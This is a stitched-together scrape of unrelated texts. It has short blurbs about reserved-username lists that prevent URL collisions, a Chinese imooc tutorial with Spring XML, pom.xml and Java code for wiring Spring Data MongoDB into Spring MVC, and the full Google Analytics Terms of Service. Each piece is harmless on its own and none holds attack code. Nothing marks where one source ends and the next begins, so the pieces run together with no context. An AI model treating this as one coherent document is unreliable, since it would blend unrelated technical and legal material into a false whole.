590+ usernames in this dictionary! A list of reserved usernames to prevent url collision with resource paths. This repository hosts the list in multiple formats like JSON, CSV, SQL and plain text. You can use its just download its by wget.

List of 3223+ generic, admin, mailer-daemon, and no-reply usernames reserved for security concerns. Made for @forwardemail.

慕课网 首页 实战 路径 猿问 手记 登录 注册 11.11 Python 手记 \ 史上最全，最详idea搭建springdata+mongoDB+maven+springmvc 史上最全，最详idea搭建springdata+mongoDB+maven+springmvc 原创 2016-10-21 10:54:297759浏览2评论 作为IT届的小弟，本篇作为本人的第一篇手记，还希望各位大牛多多指点，以下均为个人学习所得，如有错误，敬请指正。本着服务IT小白的原则，该手记比较详细。由于最近使用postgre开发大型项目，发现了关系型数据库的弊端及查询效率之慢，苦心钻研之下，对nosql的mongoDB从无知到有了初步了解。 项目环境：win10+IntelliJ IDEA2016+maven3.3.9+MongoDB 3.2+JDK1.7+spring4.1.7 推荐网站（适合学习各种知识的基础）：http://www.runoob.com/ mongo安装请参考http://www.runoob.com/mongodb/mongodb-window-install.html 由于最近osChina的maven仓库挂掉，推荐大家使用阿里的镜像，速度快的飞起 maven配置：<localRepository>F:\.m2\repository</localRepository> <mirrors> <mirror> <id>alimaven</id> <name>aliyun maven</name> <url>http://maven.aliyun.com/nexus/content/groups/public/</url> <mirrorOf>central</mirrorOf> </mirror> </mirrors> 这里不实用idea自带maven插件，改用3.3.9 图片描述 项目结构：图片描述 这里dao与mongoDao分别为mongoDB的两种查询方式： dao为JPA的查询方式（请参考springdataJPA） mongoDao使用mongoTemplate，类似于关系型数据库使用的jdbcTemplate 不罗嗦，上代码 先看配置文件 spring-context.xm为最基本的spring配置 <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:context="http://www.springframework.org/schema/context" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd"> <!--扫描service包嗲所有使用注解的类型--> <context:component-scan base-package="com.lida.mongo"/> <!-- 导入mongodb的配置文件 --> <import resource="spring-mongo.xml" /> <!-- 开启注解 --> <context:annotation-config /> </beans> spring-web.xml为springmvc的基本配置 <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:mvc="http://www.springframework.org/schema/mvc" xmlns:context="http://www.springframework.org/schema/context" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd http://www.springframework.org/schema/mvc http://www.springframework.org/schema/mvc/spring-mvc-4.0.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-4.0.xsd"> <!--配置springmvc--> <!--1.开启springmvc注解模式--> <!--简化配置： (1)主动注册DefaultAnnotationHandlerMapping,AnnotationMethodHandlerAdapter (2)提供一系列功能：数据绑定，数字和日期的format @NumberFormt @DataTimeFormat，xml json默认的读写支持--> <mvc:annotation-driven/> <!--servlet-mapping--> <!--2静态资源默认的servlet配置，（1）允许对静态资源的处理：js，gif （2）允许使用“/”做整体映射--> <!-- 容器默认的DefaultServletHandler处理 所有静态内容与无RequestMapping处理的URL--> <mvc:default-servlet-handler/> <!--3:配置jsp 显示viewResolver--> <bean class="org.springframework.web.servlet.view.InternalResourceViewResolver"> <property name="viewClass" value="org.springframework.web.servlet.view.JstlView"/> <property name="prefix" value="/WEB-INF/views/"/> <property name="suffix" value=".jsp"/> </bean> <!-- 4自动扫描且只扫描@Controller --> <context:component-scan base-package="com.lida.mongo.controller" /> <!-- 定义无需Controller的url<->view直接映射 --> <mvc:view-controller path="/" view-name="redirect:/goMongo/list"/> </beans> spring-mongo.xml为mongo配置 <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:context="http://www.springframework.org/schema/context" xmlns:mongo="http://www.springframework.org/schema/data/mongo" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd http://www.springframework.org/schema/data/mongo http://www.springframework.org/schema/data/mongo/spring-mongo.xsd"> <!-- 加载mongodb的属性配置文件 --> <context:property-placeholder location="classpath:mongo.properties" /> <!-- spring连接mongodb数据库的配置 --> <mongo:mongo-client replica-set="${mongo.hostport}" id="mongo"> <mongo:client-options connections-per-host="${mongo.connectionsPerHost}" threads-allowed-to-block-for-connection-multiplier="${mongo.threadsAllowedToBlockForConnectionMultiplier}" connect-timeout="${mongo.connectTimeout}" max-wait-time="${mongo.maxWaitTime}" socket-timeout="${mongo.socketTimeout}"/> </mongo:mongo-client> <!-- mongo的工厂，通过它来取得mongo实例,dbname为mongodb的数据库名，没有的话会自动创建 --> <mongo:db-factory id="mongoDbFactory" dbname="mongoLida" mongo-ref="mongo" /> <!-- 只要使用这个调用相应的方法操作 --> <bean id="mongoTemplate" class="org.springframework.data.mongodb.core.MongoTemplate"> <constructor-arg name="mongoDbFactory" ref="mongoDbFactory" /> </bean> <!-- mongodb bean的仓库目录，会自动扫描扩展了MongoRepository接口的接口进行注入 --> <mongo:repositories base-package="com.lida.mongo" /> </beans> mongo.properties #mongoDB连接配置 mongo.hostport=127.0.0.1:27017 mongo.connectionsPerHost=8 mongo.threadsAllowedToBlockForConnectionMultiplier=4 #连接超时时间 mongo.connectTimeout=1000 #等待时间 mongo.maxWaitTime=1500 #Socket超时时间 mongo.socketTimeout=1500 pom.xml <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>com.liad</groupId> <artifactId>mongo</artifactId> <packaging>war</packaging> <version>1.0-SNAPSHOT</version> <name>mongo Maven Webapp</name> <url>http://maven.apache.org</url> <dependencies> <!--使用junit4，注解的方式测试--> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>4.11</version> <scope>test</scope> </dependency> <!--日志--> <!--日志 slf4j,log4j,logback,common-logging--> <!--slf4j是规范/接口--> <!--log4j,logback,common-logging是日志实现 本项目使用slf4j + logback --> <dependency> <groupId>org.slf4j</groupId> <artifactId>slf4j-api</artifactId> <version>1.7.12</version> </dependency> <!--实现slf4j并整合--> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-core</artifactId> <version>1.1.1</version> </dependency> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-classic</artifactId> <version>1.1.1</version> </dependency> <!--数据库相关--> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <version>5.1.22</version> <!--maven工作范围 驱动在真正工作的时候使用，故生命周期改为runtime--> <scope>runtime</scope> </dependency> <!--servlet web相关--> <dependency> <groupId>taglibs</groupId> <artifactId>standard</artifactId> <version>1.1.2</version> </dependency> <dependency> <groupId>jstl</groupId> <artifactId>jstl</artifactId> <version>1.2</version> </dependency> <dependency> <groupId>com.fasterxml.jackson.core</groupId> <artifactId>jackson-databind</artifactId> <version>2.5.4</version> </dependency> <!--spring--> <!--spring核心--> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-core</artifactId> <version>4.1.7.RELEASE</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-beans</artifactId> <version>4.1.7.RELEASE</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-context</artifactId> <version>4.1.7.RELEASE</version> </dependency> <!--spring dao--> <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-mongodb</artifactId> <version>1.8.0.RELEASE</version> </dependency> <dependency> <groupId>org.mongodb</groupId> <artifactId>mongo-java-driver</artifactId> <version>3.2.2</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-tx</artifactId> <version>4.1.7.RELEASE</version> </dependency> <!--spring web--> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-web</artifactId> <version>4.1.7.RELEASE</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-webmvc</artifactId> <version>4.1.7.RELEASE</version> </dependency> <!--spring test--> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-test</artifactId> <version>4.1.7.RELEASE</version> </dependency> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.2.2</version> </dependency> <dependency> <groupId>commons-fileupload</groupId> <artifactId>commons-fileupload</artifactId> <version>1.3.2</version> </dependency> <dependency> <groupId>commons-codec</groupId> <artifactId>commons-codec</artifactId> <version>1.10</version> </dependency> </dependencies> <dependencyManagement> <dependencies> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-framework-bom</artifactId> <version>${spring.version}</version> <type>pom</type> <scope>import</scope> </dependency> <dependency> <groupId>net.sf.ehcache</groupId> <artifactId>ehcache-core</artifactId> <version>2.6.9</version> </dependency> </dependencies> </dependencyManagement> <build> <finalName>mongo</finalName> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <configuration> <source>1.6</source> <target>1.6</target> </configuration> </plugin> </plugins> </build> </project> 两个实体类： /** * Created by DuLida on 2016/10/20. */ public class Address { private String city; private String street; private int num; public Address() { } public Address(String city, String street, int num) { this.city = city; this.street = street; this.num = num; } public String getCity() { return city; } public void setCity(String city) { this.city = city; } public String getStreet() { return street; } public void setStreet(String street) { this.street = street; } public int getNum() { return num; } public void setNum(int num) { this.num = num; } @Override public String toString() { return "Address{" + "city='" + city + '\'' + ", street='" + street + '\'' + ", num=" + num + '}'; } } /** * Created by DuLida on 2016/10/20. */ @Document(collection="person") public class Person implements Serializable { @Id private ObjectId id; private String name; private int age; private Address address; public Person() { } public Person( String name, int age, Address address) { this.name = name; this.age = age; this.address = address; } public ObjectId getId() { return id; } public void setId(ObjectId id) { this.id = id; } public String getName() { return name; } public void setName(String name) { this.name = name; } public int getAge() { return age; } public void setAge(int age) { this.age = age; } public Address getAddress() { return address; } public void setAddress(Address address) { this.address = address; } @Override public String toString() { return "Person{" + "id=" + id + ", name='" + name + '\'' + ", age=" + age + ", address=" + address + '}'; } } JPA的dao，注意这里只要继承MongoRepository不用写注解spring就能认识这是个Repository，MongoRepository提供了基本的增删改查，不用实现便可直接调用，例如testMongo的personDao.save(persons); public interface PersonDao extends MongoRepository<Person, ObjectId> { @Query(value = "{'age' : {'$gte' : ?0, '$lte' : ?1}, 'name':?2 }",fields="{ 'name' : 1, 'age' : 1}") List<Person> findByAge(int age1, int age2, String name); } mongoTemplate的dao /** * Created by DuLida on 2016/10/21. */ public interface PersonMongoDao { List<Person> findAll(); void insertPerson(Person user); void removePerson(String userName); void updatePerson(); List<Person> findForRequery(String userName); } @Repository("personMongoImpl") public class PersonMongoImpl implements PersonMongoDao { @Resource private MongoTemplate mongoTemplate; @Override public List<Person> findAll() { return mongoTemplate.findAll(Person.class,"person"); } @Override public void insertPerson(Person person) { mongoTemplate.insert(person,"person"); } @Override public void removePerson(String userName) { mongoTemplate.remove(Query.query(Criteria.where("name").is(userName)),"person"); } @Override public void updatePerson() { mongoTemplate.updateMulti(Query.query(Criteria.where("age").gt(3).lte(5)), Update.update("age",3),"person"); } @Override public List<Person> findForRequery(String userName) { return mongoTemplate.find(Query.query(Criteria.where("name").is(userName)),Person.class); } } JPA查询的测试类： /** * Created by DuLida on 2016/10/20. */ @RunWith(SpringJUnit4ClassRunner.class) //告诉junit spring配置文件 @ContextConfiguration({"classpath:spring/spring-context.xml","classpath:spring/spring-mongo.xml"}) public class PersonDaoTest { @Resource private PersonDao personDao; /*先往数据库中插入10个person*/ @Test public void testMongo() { List<Person> persons = new ArrayList<Person>(); for (int i = 0; i < 10; i++) { persons.add(new Person("name"+i,i,new Address("石家庄","裕华路",i))); } personDao.save(persons); } @Test public void findMongo() { System.out.println(personDao.findByAge(2,8,"name6")); } } mongoTemplate查询的测试类 /** * Created by DuLida on 2016/10/21. */ @RunWith(SpringJUnit4ClassRunner.class) //告诉junit spring配置文件 @ContextConfiguration({"classpath:spring/spring-context.xml","classpath:spring/spring-mongo.xml"}) public class MongoTemplateTest { @Resource private PersonMongoImpl personMongo; @Test public void testMongoTemplate() { //personMongo.insertPerson(new Person("wukong",24,new Address("石家庄","鑫达路",20))); //personMongo.removePerson("name3"); //personMongo.updatePerson(); //System.out.println(personMongo.findAll()); System.out.println(personMongo.findForRequery("wukong")); } } 注意测试前请先通过testMongo()向数据库中插入数据。 项目源码Git地址，仅供学习使用：https://github.com/dreamSmile/mongo.git 参考资料http://docs.spring.io/spring-data/mongodb/docs/current/reference/html/ 本文原创发布于慕课网 ，转载请注明出处，谢谢合作！ 相关标签：JAVAMongoDB 时间丶思考 天才小驴 你好小Song 陈词滥调1 4 人推荐 收藏 相关阅读 JAVA第三季1-9（模拟借书系统）作业 用pkp类，players类，playgame类三步教你写扑克牌游戏 Java入门第三季习题，简易扑克牌游戏 java学习第二季哒哒租车系统 Java入门第二季第六章练习题 请登录后，发表评论 评论（Enter+Ctrl） 全部评论2条 你好小Song2F 多数据源如何配置, 比如多个mongodb数据库再加mysql 1天前回复赞同0 时间丶思考 回复 你好小Song： 41分钟前 就在加一个datasource就行啊，原来mysql的datasource怎么加，现在就怎么加上就行，加上直接用。 回复 你好小Song1F 参考一下, 学习了. 2天前回复赞同0 时间丶思考 JAVA开发工程师 情劫难逃。 3篇手记 3推荐 作者的热门手记 神奇的Canvas贝塞尔曲线画心，程序员的表白 1021浏览18推荐3评论 深入探究setTimeout 和setInterval 44浏览1推荐0评论 网站首页企业合作人才招聘联系我们合作专区关于我们讲师招募常见问题意见反馈友情链接 Copyright © 2016 imooc.com All Rights Reserved | 京ICP备 13046642号-2

Ensures usernames are url friendly. No abusive/reserved words.

List of reserved usernames to prevent URL collision with resource paths

List of Reserved Words. (Username etc.)

Marketing Platform Google Analytics Terms of Service These Google Analytics Terms of Service (this "Agreement") are entered into by Google LLC ("Google") and the entity executing this Agreement ("You"). This Agreement governs Your use of the standard Google Analytics (the "Service"). BY CLICKING THE "I ACCEPT" BUTTON, COMPLETING THE REGISTRATION PROCESS, OR USING THE SERVICE, YOU ACKNOWLEDGE THAT YOU HAVE REVIEWED AND ACCEPT THIS AGREEMENT AND ARE AUTHORIZED TO ACT ON BEHALF OF, AND BIND TO THIS AGREEMENT, THE OWNER OF THIS ACCOUNT. In consideration of the foregoing, the parties agree as follows: 1. Definitions. "Account" refers to the account for the Service. All Profiles (as applicable) linked to a single Property will have their Hits aggregated before determining the charge for the Service for that Property. "Confidential Information" includes any proprietary data and any other information disclosed by one party to the other in writing and marked "confidential" or disclosed orally and, within five business days, reduced to writing and marked "confidential". However, Confidential Information will not include any information that is or becomes known to the general public, which is already in the receiving party's possession prior to disclosure by a party or which is independently developed by the receiving party without the use of Confidential Information. "Customer Data" or "Google Analytics Data" means the data you collect, process or store using the Service concerning the characteristics and activities of Users. "Documentation" means any accompanying documentation made available to You by Google for use with the Processing Software, including any documentation available online. "GAMC" means the Google Analytics Measurement Code, which is installed on a Property for the purpose of collecting Customer Data, together with any fixes, updates and upgrades provided to You. "Hit" means a collection of interactions that results in data being sent to the Service and processed. Examples of Hits may include page view hits and ecommerce hits. A Hit can be a call to the Service by various libraries, but does not have to be so (e.g., a Hit can be delivered to the Service by other Google Analytics-supported protocols and mechanisms made available by the Service to You). "Platform Home" means the user interface through which You can access certain Google Marketing Platform-level functionality. "Processing Software" means the Google Analytics server-side software and any upgrades, which analyzes the Customer Data and generates the Reports. "Profile" means the collection of settings that together determine the information to be included in, or excluded from, a particular Report. For example, a Profile could be established to view a small portion of a web site as a unique Report. "Property" means any web page, application, other property or resource under Your control that sends data to Google Analytics. "Privacy Policy" means the privacy policy on a Property. "Report" means the resulting analysis shown at www.google.com/analytics/, some of which may include analysis for a Profile. "Servers" means the servers controlled by Google (or its wholly-owned subsidiaries) on which the Processing Software and Customer Data are stored. “SDKs” mean certain software development kits, which may be used or incorporated into a Property app for the purpose of collecting Customer Data, together with any fixes, updates, and upgrades provided to You. "Software" means the Processing Software, GAMC and/or SDKs. "Third Party" means any third party (i) to which You provide access to Your Account or (ii) for which You use the Service to collect information on the third party's behalf. "Users" means users and/or visitors to Your Properties. The words "include" and "including" mean "including but not limited to." 2. Fees and Service. Subject to Section 15, the Service is provided without charge to You for up to 10 million Hits per month per Account. Google may change its fees and payment policies for the Service from time to time including the addition of costs for geographic data, the importing of cost data from search engines, or other fees charged to Google or its wholly-owned subsidiaries by third party vendors for the inclusion of data in the Service reports. The changes to the fees or payment policies are effective upon Your acceptance of those changes which will be posted at www.google.com/analytics/. Unless otherwise stated, all fees are quoted in U.S. Dollars. Any outstanding balance becomes immediately due and payable upon termination of this Agreement and any collection expenses (including attorneys' fees) incurred by Google will be included in the amount owed, and may be charged to the credit card or other billing mechanism associated with Your AdWords account. 3. Member Account, Password, and Security. To register for the Service, You must complete the registration process by providing Google with current, complete and accurate information as prompted by the registration form, including Your e-mail address (username) and password. You will protect Your passwords and take full responsibility for Your own, and third party, use of Your accounts. You are solely responsible for any and all activities that occur under Your Account. You will notify Google immediately upon learning of any unauthorized use of Your Account or any other breach of security. Google's (or its wholly-owned subsidiaries) support staff may, from time to time, log in to the Service under Your customer password in order to maintain or improve service, including to provide You assistance with technical or billing issues. 4. Nonexclusive License. Subject to the terms and conditions of this Agreement, (a) Google grants You a limited, revocable, non-exclusive, non-sublicensable license to install, copy and use the GAMC and/or SDKs solely as necessary for You to use the Service on Your Properties or Third Party's Properties; and (b) You may remotely access, view and download Your Reports stored at www.google.com/analytics/. You will not (and You will not allow any third party to) (i) copy, modify, adapt, translate or otherwise create derivative works of the Software or the Documentation; (ii) reverse engineer, decompile, disassemble or otherwise attempt to discover the source code of the Software, except as expressly permitted by the law in effect in the jurisdiction in which You are located; (iii) rent, lease, sell, assign or otherwise transfer rights in or to the Software, the Documentation or the Service; (iv) remove any proprietary notices or labels on the Software or placed by the Service; (v) use, post, transmit or introduce any device, software or routine which interferes or attempts to interfere with the operation of the Service or the Software; or (vi) use data labeled as belonging to a third party in the Service for purposes other than generating, viewing, and downloading Reports. You will comply with all applicable laws and regulations in Your use of and access to the Documentation, Software, Service and Reports. 5. Confidentiality and Beta Features. Neither party will use or disclose the other party's Confidential Information without the other's prior written consent except for the purpose of performing its obligations under this Agreement or if required by law, regulation or court order; in which case, the party being compelled to disclose Confidential Information will give the other party as much notice as is reasonably practicable prior to disclosing the Confidential Information. Certain Service features are identified as "Alpha," "Beta," "Experiment," (either within the Service or elsewhere by Google) or as otherwise unsupported or confidential (collectively, "Beta Features"). You may not disclose any information from Beta Features or the terms or existence of any non-public Beta Features. Google will have no liability arising out of or related to any Beta Features. 6. Information Rights and Publicity. Google and its wholly owned subsidiaries may retain and use, subject to the terms of its privacy policy (located at https://www.google.com/policies/privacy/), information collected in Your use of the Service. Google will not share Your Customer Data or any Third Party's Customer Data with any third parties unless Google (i) has Your consent for any Customer Data or any Third Party's consent for the Third Party's Customer Data; (ii) concludes that it is required by law or has a good faith belief that access, preservation or disclosure of Customer Data is reasonably necessary to protect the rights, property or safety of Google, its users or the public; or (iii) provides Customer Data in certain limited circumstances to third parties to carry out tasks on Google's behalf (e.g., billing or data storage) with strict restrictions that prevent the data from being used or shared except as directed by Google. When this is done, it is subject to agreements that oblige those parties to process Customer Data only on Google's instructions and in compliance with this Agreement and appropriate confidentiality and security measures. 7. Privacy. You will not and will not assist or permit any third party to, pass information to Google that Google could use or recognize as personally identifiable information. You will have and abide by an appropriate Privacy Policy and will comply with all applicable laws, policies, and regulations relating to the collection of information from Users. You must post a Privacy Policy and that Privacy Policy must provide notice of Your use of cookies, identifiers for mobile devices (e.g., Android Advertising Identifier or Advertising Identifier for iOS) or similar technology used to collect data. You must disclose the use of Google Analytics, and how it collects and processes data. This can be done by displaying a prominent link to the site "How Google uses data when you use our partners' sites or apps", (located at www.google.com/policies/privacy/partners/, or any other URL Google may provide from time to time). You will use commercially reasonable efforts to ensure that a User is provided with clear and comprehensive information about, and consents to, the storing and accessing of cookies or other information on the User’s device where such activity occurs in connection with the Service and where providing such information and obtaining such consent is required by law. You must not circumvent any privacy features (e.g., an opt-out) that are part of the Service. You will comply with all applicable Google Analytics policies located at www.google.com/analytics/policies/ (or such other URL as Google may provide) as modified from time to time (the "Google Analytics Policies"). You may participate in an integrated version of Google Analytics and certain Google advertising services ("Google Analytics Advertising Features"). If You use Google Analytics Advertising Features, You will adhere to the Google Analytics Advertising Features policy (available at support.google.com/analytics/bin/answer.py?hl=en&topic=2611283&answer=2700409). Your access to and use of any Google advertising service is subject to the applicable terms between You and Google regarding that service. If You use the Platform Home, Your use of the Platform Home is subject to the Platform Home Additional Terms (or as subsequently re-named) available at https://support.google.com/marketingplatform/answer/9047313 (or such other URL as Google may provide) as modified from time to time (the "Platform Home Terms"). 8. Indemnification. To the extent permitted by applicable law, You will indemnify, hold harmless and defend Google and its wholly-owned subsidiaries, at Your expense, from any and all third-party claims, actions, proceedings, and suits brought against Google or any of its officers, directors, employees, agents or affiliates, and all related liabilities, damages, settlements, penalties, fines, costs or expenses (including, reasonable attorneys' fees and other litigation expenses) incurred by Google or any of its officers, directors, employees, agents or affiliates, arising out of or relating to (i) Your breach of any term or condition of this Agreement, (ii) Your use of the Service, (iii) Your violations of applicable laws, rules or regulations in connection with the Service, (iv) any representations and warranties made by You concerning any aspect of the Service, the Software or Reports to any Third Party; (v) any claims made by or on behalf of any Third Party pertaining directly or indirectly to Your use of the Service, the Software or Reports; (vi) violations of Your obligations of privacy to any Third Party; and (vii) any claims with respect to acts or omissions of any Third Party in connection with the Service, the Software or Reports. Google will provide You with written notice of any claim, suit or action from which You must indemnify Google. You will cooperate as fully as reasonably required in the defense of any claim. Google reserves the right, at its own expense, to assume the exclusive defense and control of any matter subject to indemnification by You. 9. Third Parties. If You use the Service on behalf of the Third Party or a Third Party otherwise uses the Service through Your Account, whether or not You are authorized by Google to do so, then You represent and warrant that (a) You are authorized to act on behalf of, and bind to this Agreement, the Third Party to all obligations that You have under this Agreement, (b) Google may share with the Third Party any Customer Data that is specific to the Third Party's Properties, and (c) You will not disclose Third Party's Customer Data to any other party without the Third Party's consent. 10. DISCLAIMER OF WARRANTIES. TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, EXCEPT AS EXPRESSLY PROVIDED FOR IN THIS AGREEMENT, GOOGLE MAKES NO OTHER WARRANTY OF ANY KIND, WHETHER EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR USE AND NONINFRINGEMENT. 11. LIMITATION OF LIABILITY. TO THE EXTENT PERMITTED BY APPLICABLE LAW, GOOGLE WILL NOT BE LIABLE FOR YOUR LOST REVENUES OR INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, EXEMPLARY, OR PUNITIVE DAMAGES, EVEN IF GOOGLE OR ITS SUBSIDIARIES AND AFFILIATES HAVE BEEN ADVISED OF, KNEW OR SHOULD HAVE KNOWN THAT SUCH DAMAGES WERE POSSIBLE AND EVEN IF DIRECT DAMAGES DO NOT SATISFY A REMEDY. GOOGLE'S (AND ITS WHOLLY OWNED SUBSIDIARIES’) TOTAL CUMULATIVE LIABILITY TO YOU OR ANY OTHER PARTY FOR ANY LOSS OR DAMAGES RESULTING FROM CLAIMS, DEMANDS, OR ACTIONS ARISING OUT OF OR RELATING TO THIS AGREEMENT WILL NOT EXCEED $500 (USD). 12. Proprietary Rights Notice. The Service, which includes the Software and all Intellectual Property Rights therein are, and will remain, the property of Google (and its wholly owned subsidiaries). All rights in and to the Software not expressly granted to You in this Agreement are reserved and retained by Google and its licensors without restriction, including, Google's (and its wholly owned subsidiaries’) right to sole ownership of the Software and Documentation. Without limiting the generality of the foregoing, You agree not to (and not to allow any third party to): (a) sublicense, distribute, or use the Service or Software outside of the scope of the license granted in this Agreement; (b) copy, modify, adapt, translate, prepare derivative works from, reverse engineer, disassemble, or decompile the Software or otherwise attempt to discover any source code or trade secrets related to the Service; (c) rent, lease, sell, assign or otherwise transfer rights in or to the Software, Documentation or the Service; (d) use, post, transmit or introduce any device, software or routine which interferes or attempts to interfere with the operation of the Service or the Software; (e) use the trademarks, trade names, service marks, logos, domain names and other distinctive brand features or any copyright or other proprietary rights associated with the Service for any purpose without the express written consent of Google; (f) register, attempt to register, or assist anyone else to register any trademark, trade name, serve marks, logos, domain names and other distinctive brand features, copyright or other proprietary rights associated with Google (or its wholly owned subsidiaries) other than in the name of Google (or its wholly owned subsidiaries, as the case may be); (g) remove, obscure, or alter any notice of copyright, trademark, or other proprietary right appearing in or on any item included with the Service or Software; or (h) seek, in a proceeding filed during the term of this Agreement or for one year after such term, an injunction of any portion of the Service based on patent infringement. 13. U.S. Government Rights. If the use of the Service is being acquired by or on behalf of the U.S. Government or by a U.S. Government prime contractor or subcontractor (at any tier), in accordance with 48 C.F.R. 227.7202-4 (for Department of Defense (DOD) acquisitions) and 48 C.F.R. 2.101 and 12.212 (for non-DOD acquisitions), the Government's rights in the Software, including its rights to use, modify, reproduce, release, perform, display or disclose the Software or Documentation, will be subject in all respects to the commercial license rights and restrictions provided in this Agreement. 14. Term and Termination. Either party may terminate this Agreement at any time with notice. Upon any termination of this Agreement, Google will stop providing, and You will stop accessing the Service. Additionally, if Your Account and/or Properties are terminated, You will (i) delete all copies of the GAMC from all Properties and/or (ii) suspend any and all use of the SDKs within 3 business days of such termination. In the event of any termination (a) You will not be entitled to any refunds of any usage fees or any other fees, and (b) any outstanding balance for Service rendered through the date of termination will be immediately due and payable in full and (c) all of Your historical Report data will no longer be available to You. 15. Modifications to Terms of Service and Other Policies. Google may modify these terms or any additional terms that apply to the Service to, for example, reflect changes to the law or changes to the Service. You should look at the terms regularly. Google will post notice of modifications to these terms at https://www.google.com/analytics/terms/, the Google Analytics Policies at www.google.com/analytics/policies/, or other policies referenced in these terms at the applicable URL for such policies. Changes will not apply retroactively and will become effective no sooner than 14 days after they are posted. If You do not agree to the modified terms for the Service, You should discontinue Your use Google Analytics. No amendment to or modification of this Agreement will be binding unless (i) in writing and signed by a duly authorized representative of Google, (ii) You accept updated terms online, or (iii) You continue to use the Service after Google has posted updates to the Agreement or to any policy governing the Service. 16. Miscellaneous, Applicable Law and Venue. Google will be excused from performance in this Agreement to the extent that performance is prevented, delayed or obstructed by causes beyond its reasonable control. This Agreement (including any amendment agreed upon by the parties in writing) represents the complete agreement between You and Google concerning its subject matter, and supersedes all prior agreements and representations between the parties. If any provision of this Agreement is held to be unenforceable for any reason, such provision will be reformed to the extent necessary to make it enforceable to the maximum extent permissible so as to effect the intent of the parties, and the remainder of this Agreement will continue in full force and effect. This Agreement will be governed by and construed under the laws of the state of California without reference to its conflict of law principles. In the event of any conflicts between foreign law, rules, and regulations, and California law, rules, and regulations, California law, rules and regulations will prevail and govern. Each party agrees to submit to the exclusive and personal jurisdiction of the courts located in Santa Clara County, California. The United Nations Convention on Contracts for the International Sale of Goods and the Uniform Computer Information Transactions Act do not apply to this Agreement. The Software is controlled by U.S. Export Regulations, and it may be not be exported to or used by embargoed countries or individuals. Any notices to Google must be sent to: Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA, with a copy to Legal Department, via first class or air mail or overnight courier, and are deemed given upon receipt. A waiver of any default is not a waiver of any subsequent default. You may not assign or otherwise transfer any of Your rights in this Agreement without Google's prior written consent, and any such attempt is void. The relationship between Google and You is not one of a legal partnership relationship, but is one of independent contractors. This Agreement will be binding upon and inure to the benefit of the respective successors and assigns of the parties hereto. The following sections of this Agreement will survive any termination thereof: 1, 4, 5, 6 (except the last two sentences), 7, 8, 9, 10, 11, 12, 14, 16, and 17. 17. Google Analytics for Firebase. If You link a Property to Firebase (“Firebase Linkage”) as part of using the Service, the following terms, in addition to Sections 1-16 above, will also apply to You, and will also govern Your use of the Service, including with respect to Your use of Firebase Linkage. Other than as modified below, all other terms will stay the same and continue to apply. In the event of a conflict between this Section 17 and Sections 1-16 above, the terms in Section 17 will govern and control solely with respect to Your use of the Firebase Linkage. The following definition in Section 1 is modified as follows: "Hit" means a collection of interactions that results in data being sent to the Service and processed. Examples of Hits may include page view hits and ecommerce hits. A Hit can be a call to the Service by various libraries, but does not have to be so (e.g., a Hit can be delivered to the Service by other Google Analytics-supported protocols and mechanisms made available by the Service to You). For the sake of clarity, a Hit does not include certain events whose collection reflects interactions with certain Properties capable of supporting multiple data streams, and which may include screen views and custom events (the collection of events, an “Enhanced Packet”). The following sentence is added to the end of Section 7 as follows: If You link a Property to a Firebase project (“Firebase Linkage”) (i) certain data from Your Property, including Customer Data, may be made accessible within or to any other entity or personnel according to permissions set in Firebase and (ii) that Property may have certain Service settings modified by authorized personnel of Firebase (notwithstanding the settings You may have designated for that Property within the Service). Last Updated June 17, 2019 Follow us About Google Marketing Platform Overview For Small Businesses For Enterprise Learning & support Support Blog Analytics Academy Skillshop Google Primer Developers & partners Google Marketing Platform Partners Google Measurement Partners Analytics for developers Tag Manager for developers Surveys for developers Campaign Manager 360 for developers Related products Google Ads Google AdSense Google Ad Manager Google Cloud Firebase More from Google Think with Google Business Solutions Google Workspace PrivacyTermsAbout GoogleGoogle Products Help

custom validator that validates username is not included in the list of reserved names for ActiveModel

